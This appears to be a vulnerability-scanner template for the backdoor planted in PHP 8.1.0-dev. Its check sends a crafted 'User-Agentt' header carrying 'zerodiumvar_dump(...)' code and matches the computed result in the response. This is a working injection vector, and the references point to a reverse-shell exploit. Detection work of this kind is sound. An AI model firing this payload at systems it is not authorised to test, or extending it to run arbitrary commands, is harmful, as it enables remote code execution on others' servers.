id: php-zerodium-backdoor-rce

info:
  name: PHP 8.1.0-dev - Backdoor Remote Code Execution
  author: dhiyaneshDk
  severity: critical
  description: |
    PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code.
  reference:
    - https://news-web.php.net/php.internals/113838
    - https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
    - https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: php,backdoor,rce,zerodium

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      User-Agentt: zerodiumvar_dump(233333*333332);

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "int(77777355556)"

# digest: 490a004630440220798fc64342c5b7ab26635f6cb7c780511c340774286730f3ca33d4b14c53ce9f02200b96409f7adb45acf661884a31dffe0918d3ed22d56a3ea20abd822eeddbbad9:922c64590222798bb761d5b6d8e72950